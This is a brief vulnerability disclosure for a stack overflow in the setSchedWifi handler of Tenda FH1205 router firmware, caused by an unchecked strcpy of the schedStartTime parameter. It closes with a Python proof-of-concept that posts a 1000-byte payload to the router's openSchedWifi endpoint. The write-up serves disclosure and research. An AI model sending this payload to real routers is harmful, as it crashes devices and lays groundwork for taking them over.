- Firmware download website: https://www.tenda.com.cn/download/detail-2236.html
FH1205 V2.0.0.7(775)
The Tenda FH1205 V2.0.0.7(775) firmware has a stack overflow vulnerability in the setSchedWifi
function. The src
variable receives the schedStartTime
parameter from a POST request and is later assigned to the ptr
variable, which is fixed at 25 bytes. However, since the user can control the input of schedStartTime
, the statement strcpy((char *)ptr + 2, src);
can cause a buffer overflow. The user-provided schedStartTime
can exceed the capacity of the ptr
array, triggering this security vulnerability.
import requests
from pwn import*
ip = "192.168.84.101"
url = "http://" + ip + "/goform/openSchedWifi"
payload = b"a"*1000
data = {"schedWifiEnable":0,"schedStartTime": payload}
response = requests.post(url, data=data)
print(response.text)